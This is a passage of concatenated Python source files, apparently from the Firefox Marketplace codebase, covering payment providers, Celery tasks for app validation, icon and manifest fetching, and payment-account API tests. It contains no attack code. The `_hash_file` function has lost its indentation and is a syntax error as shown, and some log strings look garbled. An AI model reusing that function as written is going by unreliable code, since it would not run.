    def account_retrieve(self, account):
        # Boku exposes no editable account data.
        return {}
    @account_check
    def terms_retrieve(self, account):
        # Boku terms are accepted during signup; always report accepted.
        return {'accepted': True}
    @account_check
    def terms_update(self, account):
        account.update(agreed_tos=True)
        return {'accepted': True}
    @account_check
    def product_create(self, account, app):
        """Create or re-point the Boku product for *app* in Solitude."""
        generic_product = self.get_or_create_generic_product(app)
        existing_boku_products = self.client.product.get(
            seller_product=generic_product['resource_pk'])
        existing_count = existing_boku_products['meta']['total_count']
        if existing_count == 0:
            boku_product = self.client.product.post(data={
                'seller_boku': account.uri,
                'seller_product': generic_product['resource_uri']})
        elif existing_count == 1:
            # Re-point the existing product at the (possibly new) account.
            existing_boku_product = existing_boku_products['objects'][0]
            boku_product = self.client.by_url(
                existing_boku_product['resource_uri'],
            ).patch(
                data={
                    'seller_boku': account.uri,
                    'seller_product': generic_product['resource_uri']})
        else:
            raise ValueError((
                'More than one existing Boku Product found when '
                'creating a new Boku Product in Solitude: {products}'
            ).format(products=existing_boku_products['objects']))
        return boku_product['resource_uri']
    def get_portal_url(self, app_slug=None):
        return settings.BOKU_PORTAL
# Registries of provider implementations, keyed by name and by numeric id.
_PROVIDER_CLASSES = (Bango, Reference, Boku)
ALL_PROVIDERS = dict((cls.name, cls) for cls in _PROVIDER_CLASSES)
ALL_PROVIDERS_BY_ID = dict((cls.provider, cls) for cls in _PROVIDER_CLASSES)
def get_provider(name=None, id=None):
    """
    Get a provider implementation instance by name or id.
    """
    if id is not None:
        cls = ALL_PROVIDERS_BY_ID[id]
    else:
        if name is None:
            # This returns the default provider so we can provide backwards
            # capability for API's that expect get_provider to return 'bango'.
            # TODO: This should raise an exception after we clean up Bango
            # code.
            name = settings.DEFAULT_PAYMENT_PROVIDER
        cls = ALL_PROVIDERS[name]
    provider = cls()
    if provider.name not in settings.PAYMENT_PROVIDERS:
        raise ImproperlyConfigured(
            'The provider {p} is not one of the '
            'allowed PAYMENT_PROVIDERS.'.format(p=provider.name))
    return provider
def get_providers():
    """Instantiate each provider enabled in settings.PAYMENT_PROVIDERS."""
    providers = []
    for name in settings.PAYMENT_PROVIDERS:
        providers.append(ALL_PROVIDERS[name]())
    return providers
########NEW FILE########
__FILENAME__ = serializers
from rest_framework.serializers import ModelSerializer, SerializerMethodField
from mkt.webapps.models import ContentRating
class ContentRatingSerializer(ModelSerializer):
    """Serializes a ContentRating, exposing the rating body and rating
    value as their labels."""
    body = SerializerMethodField('get_body')
    rating = SerializerMethodField('get_rating')

    def get_body(self, obj):
        return obj.get_body().label

    def get_rating(self, obj):
        return obj.get_rating().label

    class Meta:
        model = ContentRating
        fields = ('created', 'modified', 'body', 'rating')
########NEW FILE########
__FILENAME__ = signals
import django.dispatch
# Signal fired when the app submission process has finished.
submission_done = django.dispatch.Signal()
########NEW FILE########
__FILENAME__ = tasks
# -*- coding: utf-8 -*-
import base64
import hashlib
import json
import logging
import os
import shutil
import subprocess
import sys
import traceback
import urlparse
import uuid
import zipfile
from datetime import date
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.utils.http import urlencode
import requests
from appvalidator import validate_app, validate_packaged_app
from celery_tasktree import task_with_callbacks
from celeryutils import task
from django_statsd.clients import statsd
from PIL import Image
from tower import ugettext as _
import amo
from addons.models import Addon
from amo.decorators import set_modified_on, write
from amo.helpers import absolutify
from amo.utils import remove_icons, resize_image, send_mail_jinja, strip_bom
from files.models import FileUpload, File, FileValidation
from files.utils import SafeUnzip
from mkt.constants import APP_PREVIEW_SIZES
from mkt.webapps.models import AddonExcludedRegion, Webapp
from mkt.webapps.utils import iarc_get_app_info
log = logging.getLogger('z.mkt.developers.task')

# MDN page explaining how manifests must be served; referenced in the
# content-type validation error message below.
CT_URL = (
    'https://developer.mozilla.org/docs/Web/Apps/Manifest#Serving_manifests'
)
@task
@write
def validator(upload_id, **kw):
    """Validate the app in the given FileUpload.

    If the upload already carries a preliminary ('prelim') validation
    result, merge its messages, success flag and error count into the
    fresh result before saving. Any exception is recorded on the upload
    as `task_error` and re-raised.
    """
    if not settings.VALIDATE_ADDONS:
        return None
    log.info(u'[FileUpload:%s] Validating app.' % upload_id)
    try:
        upload = FileUpload.objects.get(pk=upload_id)
    except FileUpload.DoesNotExist:
        log.info(u'[FileUpload:%s] Does not exist.' % upload_id)
        return
    try:
        validation_result = run_validator(upload.path, url=kw.get('url'))
        if upload.validation:
            # If there's any preliminary validation result, merge it with the
            # actual validation result.
            dec_prelim_result = json.loads(upload.validation)
            if 'prelim' in dec_prelim_result:
                dec_validation_result = json.loads(validation_result)
                # Merge the messages.
                dec_validation_result['messages'] += (
                    dec_prelim_result['messages'])
                # Merge the success value.
                if dec_validation_result['success']:
                    dec_validation_result['success'] = (
                        dec_prelim_result['success'])
                # Merge the error count (we only raise errors, not warnings).
                dec_validation_result['errors'] += dec_prelim_result['errors']
                # Put the validation result back into JSON.
                validation_result = json.dumps(dec_validation_result)
        upload.validation = validation_result
        upload.save()  # We want to hit the custom save().
    except Exception:
        # Store the error with the FileUpload job, then raise
        # it for normal logging.
        tb = traceback.format_exception(*sys.exc_info())
        upload.update(task_error=''.join(tb))
        raise
@task
@write
def file_validator(file_id, **kw):
    """Run the validator against a File and persist a FileValidation."""
    if not settings.VALIDATE_ADDONS:
        return None
    log.info(u'[File:%s] Validating file.' % file_id)
    try:
        file = File.objects.get(pk=file_id)
    except File.DoesNotExist:
        log.info(u'[File:%s] Does not exist.' % file_id)
        return
    # Unlike upload validation, let the validator raise an exception if there
    # is one.
    result = run_validator(file.file_path, url=file.version.addon.manifest_url)
    return FileValidation.from_json(file, result)
def run_validator(file_path, url=None):
    """A pre-configured wrapper around the app validator.

    A zip file is treated as a packaged app; anything else is validated
    as a hosted-app manifest. Returns the validator's JSON result.
    """
    with statsd.timer('mkt.developers.validator'):
        is_packaged = zipfile.is_zipfile(file_path)
        if is_packaged:
            log.info(u'Running `validate_packaged_app` for path: %s'
                     % (file_path))
            with statsd.timer('mkt.developers.validate_packaged_app'):
                return validate_packaged_app(
                    file_path,
                    market_urls=settings.VALIDATOR_IAF_URLS,
                    timeout=settings.VALIDATOR_TIMEOUT,
                    spidermonkey=settings.SPIDERMONKEY)
        else:
            log.info(u'Running `validate_app` for path: %s' % (file_path))
            with statsd.timer('mkt.developers.validate_app'):
                return validate_app(storage.open(file_path).read(),
                                    market_urls=settings.VALIDATOR_IAF_URLS,
                                    url=url)
def _hash_file(fd):
return hashlib.md5(fd.read()).hexdigest()[:8]
@task
@set_modified_on
def resize_icon(src, dst, sizes, locally=False, **kw):
    """Resizes addon icons.

    Writes one '<dst>-<size>.png' per requested size, queues each for
    pngcrush optimization, then hashes and deletes the source file.
    Returns {'icon_hash': ...} on success; errors are only logged.
    """
    log.info('[1@None] Resizing icon: %s' % dst)
    try:
        for s in sizes:
            size_dst = '%s-%s.png' % (dst, s)
            resize_image(src, size_dst, (s, s),
                         remove_src=False, locally=locally)
            pngcrush_image.delay(size_dst, **kw)
        if locally:
            with open(src) as fd:
                icon_hash = _hash_file(fd)
            os.remove(src)
        else:
            with storage.open(src) as fd:
                icon_hash = _hash_file(fd)
            storage.delete(src)
        log.info('Icon resizing completed for: %s' % dst)
        return {'icon_hash': icon_hash}
    except Exception, e:
        log.error("Error saving addon icon: %s; %s" % (e, dst))
@task
@set_modified_on
def pngcrush_image(src, **kw):
    """Optimizes a PNG image by running it through Pngcrush.

    Returns True on success; on a pngcrush failure schedules up to 3
    retries and returns False. Other errors are only logged.
    """
    log.info('[1@None] Optimizing image: %s' % src)
    try:
        # pngcrush -ow has some issues, use a temporary file and do the final
        # renaming ourselves.
        suffix = '.opti.png'
        tmp_path = '%s%s' % (os.path.splitext(src)[0], suffix)
        cmd = [settings.PNGCRUSH_BIN, '-q', '-rem', 'alla', '-brute',
               '-reduce', '-e', suffix, src]
        sp = subprocess.Popen(cmd, stdin=subprocess.PIPE,
                              stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = sp.communicate()
        if sp.returncode != 0:
            log.error('Error optimizing image: %s; %s' % (src,
                                                          stderr.strip()))
            pngcrush_image.retry(args=[src], kwargs=kw, max_retries=3)
            return False
        # pngcrush wrote '<base>.opti.png'; move it over the original.
        shutil.move(tmp_path, src)
        log.info('Image optimization completed for: %s' % src)
        return True
    except Exception, e:
        log.error('Error optimizing image: %s; %s' % (src, e))
@task
@set_modified_on
def resize_preview(src, instance, **kw):
    """Resizes preview images and stores the sizes on the preview."""
    thumb_dst, full_dst = instance.thumbnail_path, instance.image_path
    sizes = instance.sizes or {}
    log.info('[1@None] Resizing preview and storing size: %s' % thumb_dst)
    try:
        thumbnail_size = APP_PREVIEW_SIZES[0][:2]
        image_size = APP_PREVIEW_SIZES[1][:2]
        with storage.open(src, 'rb') as fp:
            size = Image.open(fp).size
        if size[0] > size[1]:
            # If the image is wider than tall, then reverse the wanted size
            # to keep the original aspect ratio while still resizing to
            # the correct dimensions.
            thumbnail_size = thumbnail_size[::-1]
            image_size = image_size[::-1]
        if kw.get('generate_thumbnail', True):
            sizes['thumbnail'] = resize_image(src, thumb_dst,
                                              thumbnail_size,
                                              remove_src=False)
        if kw.get('generate_image', True):
            sizes['image'] = resize_image(src, full_dst,
                                          image_size,
                                          remove_src=False)
        instance.sizes = sizes
        instance.save()
        log.info('Preview resized to: %s' % thumb_dst)
        return True
    except Exception, e:
        log.error("Error saving preview: %s; %s" % (e, thumb_dst))
@task
@write
def get_preview_sizes(ids, **kw):
    """Backfill Preview.sizes for the given addon ids by reading the
    dimensions of the stored thumbnail/image files."""
    log.info('[%s@%s] Getting preview sizes for addons starting at id: %s...'
             % (len(ids), get_preview_sizes.rate_limit, ids[0]))
    addons = Addon.objects.filter(pk__in=ids).no_transforms()
    for addon in addons:
        previews = addon.previews.all()
        log.info('Found %s previews for: %s' % (previews.count(), addon.pk))
        for preview in previews:
            try:
                log.info('Getting size for preview: %s' % preview.pk)
                sizes = {
                    'thumbnail': Image.open(preview.thumbnail_path).size,
                    'image': Image.open(preview.image_path).size,
                }
                preview.update(sizes=sizes)
            except Exception, err:
                # Best-effort backfill: log and continue with the next one.
                log.error('Failed to find size of preview: %s, error: %s'
                          % (addon.pk, err))
def _fetch_content(url):
    """GET `url` (30s timeout, streamed response) with statsd counters.

    Raises a generic Exception with a user-safe message on a non-2xx
    status, missing headers, or any connection error.
    """
    with statsd.timer('developers.tasks.fetch_content'):
        try:
            res = requests.get(url, timeout=30, stream=True)
            if not 200 <= res.status_code < 300:
                statsd.incr('developers.tasks.fetch_content.error')
                raise Exception('An invalid HTTP status code was returned.')
            if not res.headers.keys():
                statsd.incr('developers.tasks.fetch_content.error')
                raise Exception('The HTTP server did not return headers.')
            statsd.incr('developers.tasks.fetch_content.success')
            return res
        except requests.RequestException as e:
            statsd.incr('developers.tasks.fetch_content.error')
            log.error('fetch_content connection error: %s' % e)
            raise Exception('The file could not be retrieved.')
class ResponseTooLargeException(Exception):
    """Raised when a fetched response body exceeds the allowed size."""
    pass
def get_content_and_check_size(response, max_size):
    """Read the first chunk of `response` and enforce a size limit.

    Reads one byte more than `max_size` so an over-sized payload is
    detected without downloading the whole thing.

    Raises ResponseTooLargeException when more than max_size bytes arrive.
    """
    # Read one extra byte. Reject if it's too big so we don't have issues
    # downloading huge files.
    # Use the next() builtin (Python 2.6+) instead of the Python-2-only
    # `.next()` iterator method.
    content = next(response.iter_content(chunk_size=max_size + 1))
    if len(content) > max_size:
        raise ResponseTooLargeException('Too much data.')
    return content
def save_icon(webapp, content):
    """Write icon bytes to a temp file, resize them into the webapp's
    icon directory, and record the icon type on the webapp."""
    tmp_dst = os.path.join(settings.TMP_PATH, 'icon', uuid.uuid4().hex)
    with storage.open(tmp_dst, 'wb') as fd:
        fd.write(content)
    dirname = webapp.get_icon_dir()
    destination = os.path.join(dirname, '%s' % webapp.id)
    remove_icons(destination)
    resize_icon(tmp_dst, destination, amo.ADDON_ICON_SIZES,
                set_modified_on=[webapp])
    # Need to set the icon type so .get_icon_url() works
    # normally submit step 4 does it through AppFormMedia,
    # but we want to beat them to the punch.
    # resize_icon outputs pngs, so we know it's 'image/png'
    webapp.icon_type = 'image/png'
    webapp.save()
@task_with_callbacks
@write
def fetch_icon(webapp, **kw):
    """Downloads a webapp icon from the location specified in the manifest.

    Handles three sources: a data: URI embedded in the manifest, a path
    inside the packaged app's zip, or a remote URL (hosted apps).
    Returns False if icon was not able to be retrieved.
    """
    log.info(u'[1@None] Fetching icon for webapp %s.' % webapp.name)
    manifest = webapp.get_manifest_json()
    if not manifest or not 'icons' in manifest:
        # Set the icon type to empty.
        webapp.update(icon_type='')
        return
    try:
        # Pick the largest icon declared in the manifest.
        biggest = max(int(size) for size in manifest['icons'])
    except ValueError:
        log.error('No icon to fetch for webapp "%s"' % webapp.name)
        return False
    icon_url = manifest['icons'][str(biggest)]
    if icon_url.startswith('data:image'):
        image_string = icon_url.split('base64,')[1]
        content = base64.decodestring(image_string)
    else:
        if webapp.is_packaged:
            # Get icons from package.
            if icon_url.startswith('/'):
                icon_url = icon_url[1:]
            try:
                zf = SafeUnzip(webapp.get_latest_file().file_path)
                zf.is_valid()
                content = zf.extract_path(icon_url)
            except (KeyError, forms.ValidationError):  # Not found in archive.
                log.error(u'[Webapp:%s] Icon %s not found in archive'
                          % (webapp, icon_url))
                return False
        else:
            # Hosted app: resolve relative URLs against the app origin.
            if not urlparse.urlparse(icon_url).scheme:
                icon_url = webapp.origin + icon_url
            try:
                response = _fetch_content(icon_url)
            except Exception, e:
                log.error(u'[Webapp:%s] Failed to fetch icon for webapp: %s'
                          % (webapp, e))
                # Set the icon type to empty.
                webapp.update(icon_type='')
                return False
            try:
                content = get_content_and_check_size(
                    response, settings.MAX_ICON_UPLOAD_SIZE)
            except ResponseTooLargeException:
                log.warning(u'[Webapp:%s] Icon exceeds maximum size.' % webapp)
                return False
    log.info('Icon fetching completed for app "%s"; saving icon' % webapp.name)
    save_icon(webapp, content)
def failed_validation(*messages, **kwargs):
    """Return a JSON validation result shaped like the add-on validator's
    output, with every given message recorded as a tier-1 error.

    When an `upload` keyword argument with existing validation is given,
    its messages are preserved and the new errors appended.
    """
    upload = kwargs.pop('upload', None)
    if upload is not None and upload.validation:
        msgs = json.loads(upload.validation)['messages']
    else:
        msgs = []
    msgs.extend({'type': 'error', 'message': message, 'tier': 1}
                for message in messages)
    error_count = len([m for m in msgs if m['type'] == 'error'])
    return json.dumps({'errors': error_count,
                       'success': False,
                       'messages': msgs,
                       'prelim': True})
def _fetch_manifest(url, upload=None):
    """Fetch and sanity-check a webapp manifest from `url`.

    Returns the manifest content (with any BOM stripped), or None after
    recording a failure on `upload`. With upload=None, failures raise.
    """
    def fail(message, upload=None):
        if upload is None:
            # If `upload` is None, that means we're using one of @washort's old
            # implementations that expects an exception back.
            raise Exception(message)
        upload.update(validation=failed_validation(message, upload=upload))

    try:
        response = _fetch_content(url)
    except Exception, e:
        log.error('Failed to fetch manifest from %r: %s' % (url, e))
        fail(_('No manifest was found at that URL. Check the address and try '
               'again.'), upload=upload)
        return

    ct = response.headers.get('content-type', '')
    if not ct.startswith('application/x-web-app-manifest+json'):
        # NOTE: no return here — the failure is recorded but processing
        # deliberately continues with the remaining checks.
        fail(_('Manifests must be served with the HTTP header '
               '"Content-Type: application/x-web-app-manifest+json". See %s '
               'for more information.') % CT_URL,
             upload=upload)
    try:
        max_webapp_size = settings.MAX_WEBAPP_UPLOAD_SIZE
        content = get_content_and_check_size(response, max_webapp_size)
    except ResponseTooLargeException:
        fail(_('Your manifest must be less than %s bytes.') % max_webapp_size,
             upload=upload)
        return
    try:
        content.decode('utf_8')
    except (UnicodeDecodeError, UnicodeEncodeError), exc:
        log.info('Manifest decode error: %s: %s' % (url, exc))
        fail(_('Your manifest file was not encoded as valid UTF-8.'),
             upload=upload)
        return
    # Get the individual parts of the content type.
    ct_split = map(str.strip, ct.split(';'))
    if len(ct_split) > 1:
        # Figure out if we've got a charset specified.
        kv_pairs = dict(tuple(p.split('=', 1)) for p in ct_split[1:] if
                        '=' in p)
        if 'charset' in kv_pairs and kv_pairs['charset'].lower() != 'utf-8':
            fail(_("The manifest's encoding does not match the charset "
                   'provided in the HTTP Content-Type.'),
                 upload=upload)
    content = strip_bom(content)
    return content
@task
@write
def fetch_manifest(url, upload_pk=None, **kw):
    """Fetch the manifest at `url`, attach it to the FileUpload and run
    validation on the result."""
    log.info(u'[1@None] Fetching manifest: %s.' % url)
    upload = FileUpload.objects.get(pk=upload_pk)
    content = _fetch_manifest(url, upload)
    if content is None:
        # _fetch_manifest already recorded the failure on the upload.
        return
    upload.add_file([content], url, len(content), is_webapp=True)
    # Send the upload to the validator.
    validator(upload.pk, url=url)
@task
def subscribe_to_responsys(campaign, address, format='html', source_url='',
                           lang='', country='', **kw):
    """
    Subscribe a user to a list in responsys. There should be two
    fields within the Responsys system named by the "campaign"
    parameter: <campaign>_FLG and <campaign>_DATE.

    Returns True when Responsys answered with HTTP 200, False otherwise.
    """
    data = {
        'LANG_LOCALE': lang,
        'COUNTRY_': country,
        'SOURCE_URL': source_url,
        'EMAIL_ADDRESS_': address,
        'EMAIL_FORMAT_': 'H' if format == 'html' else 'T',
    }
    data['%s_FLG' % campaign] = 'Y'
    data['%s_DATE' % campaign] = date.today().strftime('%Y-%m-%d')
    data['_ri_'] = settings.RESPONSYS_ID
    try:
        # NOTE(review): the payload is sent as a GET request *body* via
        # `data=`, not as query params — presumably what Responsys expects;
        # confirm it shouldn't be `params=data` instead.
        res = requests.get('http://awesomeness.mozilla.org/pub/rf',
                           data=urlencode(data))
        return res.status_code == 200
    except requests.RequestException:
        return False
@task
def region_email(ids, regions, **kw):
    """Email the developers of each app in `ids` about newly available
    marketplace regions."""
    # NOTE: both names initially alias the same sorted list of region name
    # strings; the branches below rebind or mutate region_names into a
    # human-readable string while `regions` keeps the sorted list.
    region_names = regions = sorted([unicode(r.name) for r in regions])
    # Format the region names with commas and fanciness.
    if len(regions) == 2:
        suffix = 'two'
        region_names = ' '.join([regions[0], _(u'and'), regions[1]])
    else:
        if len(regions) == 1:
            suffix = 'one'
        elif len(regions) > 2:
            suffix = 'many'
            region_names[-1] = _(u'and') + ' ' + region_names[-1]
        region_names = ', '.join(region_names)
    log.info('[%s@%s] Emailing devs about new region(s): %s.' %
             (len(ids), region_email.rate_limit, region_names))
    for id_ in ids:
        log.info('[Webapp:%s] Emailing devs about new region(s): %s.' %
                 (id_, region_names))
        product = Webapp.objects.get(id=id_)
        to = set(product.authors.values_list('email', flat=True))
        if len(regions) == 1:
            subject = _(
                u'{region} region added to the Firefox Marketplace').format(
                region=regions[0])
        else:
            subject = _(u'New regions added to the Firefox Marketplace')
        dev_url = absolutify(product.get_dev_url('edit'),
                             settings.SITE_URL) + '#details'
        context = {'app': product.name,
                   'regions': region_names,
                   'dev_url': dev_url}
        send_mail_jinja('%s: %s' % (product.name, subject),
                        'developers/emails/new_regions_%s.ltxt' % suffix,
                        context, recipient_list=to,
                        perm_setting='app_regions')
@task
@write
def region_exclude(ids, regions, **kw):
    """Exclude every app in `ids` from every region in `regions`."""
    region_names = ', '.join(sorted(unicode(r.name) for r in regions))
    log.info('[%s@%s] Excluding new region(s): %s.' %
             (len(ids), region_exclude.rate_limit, region_names))
    for addon_id in ids:
        log.info('[Webapp:%s] Excluding region(s): %s.' %
                 (addon_id, region_names))
        for region in regions:
            # Already excluded? Swag!
            AddonExcludedRegion.objects.get_or_create(addon_id=addon_id,
                                                      region=region.id)
@task
def save_test_plan(f, filename, addon):
    """Persist an uploaded test plan file under the add-on's directory."""
    destination_path = os.path.join(settings.ADDONS_PATH, str(addon.id),
                                    filename)
    with open(destination_path, 'wb+') as out:
        for chunk in f.chunks():
            out.write(chunk)
@task
@write
def refresh_iarc_ratings(ids, **kw):
    """
    Refresh old or corrupt IARC ratings by re-fetching the certificate.
    """
    for app in Webapp.objects.filter(id__in=ids):
        data = iarc_get_app_info(app)
        if data.get('rows'):
            row = data['rows'][0]
            # We found a rating, so store the id and code for future use.
            app.set_descriptors(row.get('descriptors', []))
            app.set_interactives(row.get('interactives', []))
            app.set_content_ratings(row.get('ratings', {}))
########NEW FILE########
__FILENAME__ = test_api_payments
import json
from django.core.urlresolvers import reverse
from django import forms
from curling.lib import HttpClientError, HttpServerError
from mock import Mock, patch
from nose.tools import eq_, ok_
from rest_framework.request import Request
from test_utils import RequestFactory
import amo
from addons.models import AddonUpsell, AddonUser
from amo.tests import app_factory, TestCase
from mkt.api.tests.test_oauth import RestOAuth
from mkt.developers.api_payments import (AddonPaymentAccountSerializer,
PaymentAppViewSet)
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.developers.tests.test_providers import Patcher
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPremium, Price
# Sample Bango package (account) fields used throughout the payment API
# tests below.
package_data = {
    'companyName': 'company',
    'vendorName': 'vendor',
    'financeEmailAddress': '[email protected]',
    'adminEmailAddress': '[email protected]',
    'supportEmailAddress': '[email protected]',
    'address1': 'address 1',
    'addressCity': 'city',
    'addressState': 'state',
    'addressZipCode': 'zip',
    'addressPhone': '123',
    'countryIso': 'BRA',
    'currencyIso': 'EUR',
    'account_name': 'new',
    'provider': 'bango',
}

# Sample bank details needed to create a full Bango account.
bank_data = {
    'bankAccountPayeeName': 'name',
    'bankAccountNumber': '123',
    'bankAccountCode': '123',
    'bankName': 'asd',
    'bankAddress1': 'address 2',
    'bankAddressZipCode': '123',
    'bankAddressIso': 'BRA',
}

# Complete account-creation payload: package plus bank details.
payment_data = package_data.copy()
payment_data.update(bank_data)
class UpsellCase(TestCase):
    """Shared helpers for upsell API tests: one free app, one premium app
    and URL builders for the upsell endpoints."""

    def url(self, app):
        return reverse('app-detail', kwargs={'pk': app.pk})

    def setUp(self):
        self.free = Webapp.objects.get(pk=337141)
        self.free_url = self.url(self.free)
        self.premium = app_factory(premium_type=amo.ADDON_PREMIUM)
        self.premium_url = self.url(self.premium)
        self.upsell_list = reverse('app-upsell-list')

    def create_upsell(self):
        self.upsell = AddonUpsell.objects.create(free=self.free,
                                                 premium=self.premium)
        self.upsell_url = reverse('app-upsell-detail',
                                  kwargs={'pk': self.upsell.pk})

    def create_allowed(self):
        # Make the request's profile an author of both apps.
        AddonUser.objects.create(addon=self.free, user=self.profile)
        AddonUser.objects.create(addon=self.premium, user=self.profile)
class TestUpsell(RestOAuth, UpsellCase):
    """API tests for creating, patching and deleting upsell relations."""
    fixtures = fixture('webapp_337141', 'user_2519')

    def setUp(self):
        super(TestUpsell, self).setUp()
        UpsellCase.setUp(self)
        self.create_switch('allow-b2g-paid-submission')

    def test_create(self):
        eq_(self.client.post(self.upsell_list, data={}).status_code, 400)

    def test_missing(self):
        res = self.client.post(self.upsell_list,
                               data=json.dumps({'free': self.free_url}))
        eq_(res.status_code, 400)
        eq_(res.json['premium'], [u'This field is required.'])

    def test_not_allowed(self):
        res = self.client.post(self.upsell_list, data=json.dumps(
            {'free': self.free_url, 'premium': self.premium_url}))
        eq_(res.status_code, 403)

    def test_allowed(self):
        self.create_allowed()
        res = self.client.post(self.upsell_list, data=json.dumps(
            {'free': self.free_url, 'premium': self.premium_url}))
        eq_(res.status_code, 201)

    def test_delete_not_allowed(self):
        self.create_upsell()
        eq_(self.client.delete(self.upsell_url).status_code, 403)

    def test_delete_allowed(self):
        self.create_upsell()
        self.create_allowed()
        eq_(self.client.delete(self.upsell_url).status_code, 204)

    def test_wrong_way_around(self):
        # A premium app cannot be the "free" half of an upsell.
        res = self.client.post(self.upsell_list, data=json.dumps(
            {'free': self.premium_url, 'premium': self.free_url}))
        eq_(res.status_code, 400)

    def test_patch_new_not_allowed(self):
        # Trying to patch to a new object you do not have access to.
        self.create_upsell()
        self.create_allowed()
        another = app_factory(premium_type=amo.ADDON_PREMIUM)
        res = self.client.patch(self.upsell_url, data=json.dumps(
            {'free': self.free_url, 'premium': self.url(another)}))
        eq_(res.status_code, 403)

    def test_patch_old_not_allowed(self):
        # Trying to patch an old object you do not have access to.
        self.create_upsell()
        AddonUser.objects.create(addon=self.free, user=self.profile)
        # We did not give you access to patch away from self.premium.
        another = app_factory(premium_type=amo.ADDON_PREMIUM)
        AddonUser.objects.create(addon=another, user=self.profile)
        res = self.client.patch(self.upsell_url, data=json.dumps(
            {'free': self.free_url, 'premium': self.url(another)}))
        eq_(res.status_code, 403)

    def test_patch(self):
        self.create_upsell()
        self.create_allowed()
        another = app_factory(premium_type=amo.ADDON_PREMIUM)
        AddonUser.objects.create(addon=another, user=self.profile)
        res = self.client.patch(self.upsell_url, data=json.dumps(
            {'free': self.free_url, 'premium': self.url(another)}))
        eq_(res.status_code, 200)
class AccountCase(Patcher, TestCase):
    """Shared setup for payment account API tests: a premium app, a
    SolitudeSeller/PaymentAccount pair and patched solitude clients."""

    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
        self.app.update(premium_type=amo.ADDON_PREMIUM)
        self.seller = SolitudeSeller.objects.create(user_id=2519)
        self.account = PaymentAccount.objects.create(
            user_id=2519, solitude_seller=self.seller, account_id=123,
            name='mine')
        self.app_payment_list = reverse('app-payment-account-list')
        self.payment_list = reverse('payment-account-list')
        self.payment_url = reverse('payment-account-detail',
                                   kwargs={'pk': self.account.pk})
        super(AccountCase, self).setUp()
        self.patched_client.api.generic.product.get_object.return_value = {
            'resource_uri': 'foo'}
        self.patched_client.api.bango.product.get_object.return_value = {
            'resource_uri': 'foo', 'bango_id': 'bar'}

    def create(self):
        self.payment = AddonPaymentAccount.objects.create(
            addon=self.app, payment_account=self.account)
        self.app_payment_detail = reverse('app-payment-account-detail',
                                          kwargs={'pk': self.payment.pk})

    def create_price(self):
        price = Price.objects.create(price='1')
        AddonPremium.objects.create(addon=self.app, price=price)

    def create_user(self):
        AddonUser.objects.create(addon=self.app, user=self.profile)

    def other(self, shared=False):
        # A second user's payment account; returns POST data pointing at it.
        self.seller2 = SolitudeSeller.objects.create(user_id=31337, uuid='foo')
        self.other_account = PaymentAccount.objects.create(
            user_id=31337, solitude_seller=self.seller2, account_id=123,
            seller_uri='seller_uri', uri='uri', shared=shared, name='other')
        self.other_url = reverse('payment-account-detail',
                                 kwargs={'pk': self.other_account.pk})
        return self.data(overrides={'payment_account': self.other_url})

    def data(self, overrides=None):
        res = {
            'addon': self.app.get_api_url(pk=True),
            'payment_account': self.payment_url,
            'provider': 'bango',
        }
        if overrides:
            res.update(overrides)
        return res
class TestSerializer(AccountCase):
    """Smoke tests for AddonPaymentAccountSerializer."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_2519')

    def test_serialize(self):
        # Just a smoke test that we can serialize this correctly.
        self.create()
        request = Request(RequestFactory().get('/'))
        res = AddonPaymentAccountSerializer(self.payment,
                                            context={'request': request}).data
        eq_(res['url'], self.app_payment_detail)

    def test_free(self):
        # Just a smoke test that we can serialize this correctly.
        self.create()
        self.app.update(premium_type=amo.ADDON_FREE)
        res = AddonPaymentAccountSerializer(self.payment)
        ok_(not res.is_valid())
class TestPaymentAccount(AccountCase, RestOAuth):
    """API tests for listing, creating, updating and deleting payment
    accounts, including visibility of other users' accounts."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_2519')

    def test_anonymous(self):
        r = self.anon.get(self.payment_url)
        eq_(r.status_code, 403)
        r = self.anon.get(self.payment_list)
        eq_(r.status_code, 403)

    def test_get_payments_account_list(self):
        # Other users' accounts must not show up in the list.
        self.other()
        res = self.client.get(self.payment_list)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['account_name'], 'mine')
        eq_(data['objects'][0]['resource_uri'], self.payment_url)

    def test_get_payments_account(self):
        res = self.client.get(self.payment_url)
        eq_(res.status_code, 200, res.content)
        data = json.loads(res.content)
        eq_(data['account_name'], 'mine')
        eq_(data['resource_uri'], self.payment_url)

    def test_get_other_payments_account(self):
        self.other()
        res = self.client.get(self.other_url)
        eq_(res.status_code, 404, res.content)

    def test_create(self):
        res = self.client.post(self.payment_list,
                               data=json.dumps(payment_data))
        data = json.loads(res.content)
        eq_(data['account_name'], 'new')
        new_account = PaymentAccount.objects.get(name='new')
        ok_(new_account.pk != self.account.pk)
        eq_(new_account.user, self.user)
        # Check the data forwarded to the Bango client; account_name and
        # provider are local-only and should not be passed through.
        data = self.bango_patcher.package.post.call_args[1]['data']
        expected = package_data.copy()
        expected.pop('account_name')
        expected.pop('provider')
        for key in expected.keys():
            eq_(package_data[key], data[key])

    def test_update_payments_account(self):
        res = self.client.put(self.payment_url,
                              data=json.dumps(payment_data))
        eq_(res.status_code, 204, res.content)
        self.account.reload()
        eq_(self.account.name, 'new')
        data = self.bango_patcher.api.by_url().patch.call_args[1]['data']
        expected = package_data.copy()
        expected.pop('account_name')
        expected.pop('provider')
        for key in expected.keys():
            eq_(package_data[key], data[key])

    def test_update_other_payments_account(self):
        self.other()
        res = self.client.put(self.other_url,
                              data=json.dumps(payment_data))
        eq_(res.status_code, 404, res.content)
        self.other_account.reload()
        eq_(self.other_account.name, 'other')  # not "new".

    def test_delete_payments_account(self):
        self.create_user()
        self.create()
        eq_(self.account.inactive, False)
        res = self.client.delete(self.payment_url)
        eq_(res.status_code, 204, res.content)
        self.account.reload()
        eq_(self.account.inactive, True)

    def test_delete_shared(self):
        # Shared accounts cannot be deleted.
        self.create_user()
        self.create()
        self.account.update(shared=True)
        eq_(self.account.inactive, False)
        res = self.client.delete(self.payment_url)
        eq_(res.status_code, 409)

    def test_delete_others_payments_account(self):
        self.create_user()
        self.create()
        self.other()
        eq_(self.other_account.inactive, False)
        res = self.client.delete(self.other_url)
